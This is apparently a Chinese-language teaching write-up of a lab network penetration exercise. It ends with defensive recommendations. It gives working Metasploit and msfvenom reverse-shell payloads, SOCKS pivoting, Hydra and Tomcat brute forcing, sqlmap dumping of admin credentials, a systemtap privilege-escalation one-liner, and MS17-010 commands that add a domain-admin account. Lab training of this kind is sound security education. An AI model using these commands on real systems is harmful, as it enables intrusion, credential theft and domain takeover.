内网靶场渗透实战教学文档

一、环境准备

网络拓扑与IP配置

• 攻击机1：Windows系统，IP 172.16.6.203
• 攻击机2：Kali Linux系统，IP 172.16.6.202
• 主机：IP 172.16.6.201
• 网关：172.16.6.1
• 子网掩码：255.255.255.0
• 初始目标：172.16.6.10

网络结构说明

• 发现192.168.6.200是一台双网卡主机（实际为防火墙）
• 防火墙做了端口映射：
  • E主机的445端口映射到防火墙445端口
  • F主机的3389端口映射到防火墙的3389端口

二、渗透流程详解

1. 初始目标渗透（172.16.6.10）

1.1 菜刀连接

• 发现伪协议注入点：http://172.16.6.10/index.php?page=php://input
• 使用2020年版中国菜刀连接

1.2 生成并上传木马

• 确认目标为Linux系统
• 使用msfvenom生成Linux木马：

  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.6.147 LPORT=2337 -f elf -a x86 --platform linux -o /home/hula.elf
  

• 设置监听：

  use exploit/multi/handler
  set payload linux/x86/meterpreter/reverse_tcp
  set LHOST 172.16.6.147
  set LPORT 2337
  exploit
  

• 通过菜刀上传木马，赋予执行权限并运行

1.3 内网信息收集

• 发现双网卡：
  • 172.16.6.10
  • 192.168.6.10
• 自动添加路由：

  run post/multi/manage/autoroute
  

• 建立SOCKS4a代理：

  use auxiliary/server/socks4a
  set srvhost 172.16.6.147
  set srvport 1080
  exploit
  

• 端口扫描：

  use auxiliary/scanner/portscan/tcp
  set rhosts 192.168.6.0/24
  exploit
  

  扫描结果：
  • 192.168.6.15: 21/22
  • 192.168.6.16: 22/80/3306/8080
  • 192.168.6.17: 22/80/3306
  • 192.168.6.200: 80/135/445/3389

1.4 本机提权尝试

• 使用systemtap提权方法：

  printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
  

2. 目标192.168.6.15渗透

2.1 Hydra爆破FTP

• 使用proxychains进行代理爆破：

  proxychains hydra -L /usr/wordlists/字典/Usernames/top_shortlist.txt -P /usr/wordlists/rockyou.txt -f -t 50 -vV ssh://192.168.6.15 -o ./ssh.log
  

• 爆破结果：admin/123456

2.2 登录FTP服务

• 使用proxychains连接：

  proxychains ftp 192.168.6.15
  

• 发现FTP服务异常，改用Xshell连接成功

3. 目标192.168.6.16渗透

3.1 发现Tomcat服务

• 访问8080端口发现Tomcat管理页面

3.2 MSF爆破Tomcat密码

• 使用模块：

  use auxiliary/scanner/http/tomcat_mgr_login
  set rhosts 192.168.6.16
  set stop_on_success true
  exploit
  

• 爆破结果：tomcat/tomcat

3.3 上传WAR木马

• 生成WAR木马：

  msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.6.10 LPORT=20003 -f war > lmx3.war
  

• 通过Tomcat管理页面上传并部署
• 设置监听获取meterpreter会话

4. 目标192.168.6.17渗透

4.1 SQL注入

• 发现注入点：http://192.168.6.17/message.php?id=
• 手工测试确认存在注入漏洞
• 使用sqlmap：

  proxychains sqlmap -r /home/17tou.txt --batch --dbs
  proxychains sqlmap -r /home/17tou.txt --batch -T admin --dump
  

• 获取管理员账号密码（MD5解密后）

4.2 后台文件上传

• 登录后台发现文件上传点
• 上传PHP木马并通过菜刀连接
• 尝试反弹meterpreter失败

5. 目标192.168.6.200渗透

5.1 Web服务访问

• 设置浏览器SOCKS代理访问80端口
• 尝试弱口令爆破未成功

5.2 永恒之蓝攻击

• 使用MS17-010模块：

  use exploit/windows/smb/ms17_010_command
  set rhosts 192.168.6.200
  set command 'net user cbr Cbr123456 /add'
  set command 'net group "Domain Admins" cbr /add /domain'
  exploit
  

• 验证用户是否添加成功：

  set command 'net group "Domain Admins"'
  exploit
  

5.3 远程登录

• 使用rdesktop连接：

  proxychains rdesktop 192.168.6.200
  

• 发现目标在域中，网关10.1.1.1，地址10.1.1.200（端口映射导致）

6. 域成员机10.1.1.200渗透

6.1 永恒之蓝攻击

• 同样使用MS17-010模块添加域管理员

6.2 远程登录尝试

• 上传木马反弹meterpreter失败

7. 域控10.1.1.10攻击尝试

7.1 端口转发问题

• 发现MS17-010攻击实际在192.168.6.200上执行
• 尝试lcx端口转发失败
• 尝试xshell建立隧道失败

三、关键知识点总结

1. 内网代理建立：

   • 使用autoroute添加路由
   • 建立SOCKS4a代理实现内网穿透

2. 木马生成与反弹：

   • Linux系统使用ELF格式木马
   • Java应用使用WAR格式木马
   • 注意设置正确的监听参数

3. 常见服务爆破：

   • FTP/SSH使用Hydra爆破
   • Tomcat使用专用模块爆破

4. SQL注入利用：

   • 手工测试确认注入点
   • 使用sqlmap自动化注入

5. 永恒之蓝利用：

   • MS17-010漏洞添加用户
   • 注意命令格式（使用单引号包裹长命令）

6. 端口映射识别：

   • 注意双网卡主机可能存在的端口映射
   • 攻击行为可能发生在映射主机上

7. 提权方法：

   • Linux系统尝试systemtap提权
   • Windows系统通过漏洞添加管理员

四、工具清单

1. 渗透工具：

   • Metasploit Framework
   • Sqlmap
   • Hydra
   • Proxychains
   • 中国菜刀

2. 扫描工具：

   • Nikto
   • MSF端口扫描模块

3. 远程连接工具：

   • Rdesktop
   • Xshell

4. 代理工具：

   • SOCKS4a
   • SocksCap

5. 木马生成：

   • msfvenom

五、防御建议

1. 服务安全：

   • 禁用不必要的服务
   • 修改默认账号密码
   • 限制管理后台访问IP

2. 漏洞防护：

   • 及时安装补丁（特别是MS17-010）
   • 关闭不必要的端口

3. 权限控制：

   • 最小权限原则
   • 定期审计用户权限

4. 日志监控：

   • 监控异常登录行为
   • 分析可疑的网络流量

5. 网络隔离：

   • 合理划分网络区域
   • 限制跨网段访问

通过本案例可以全面了解内网渗透的完整流程和各种技术手段的应用，同时也强调了内网安全防护的重要性。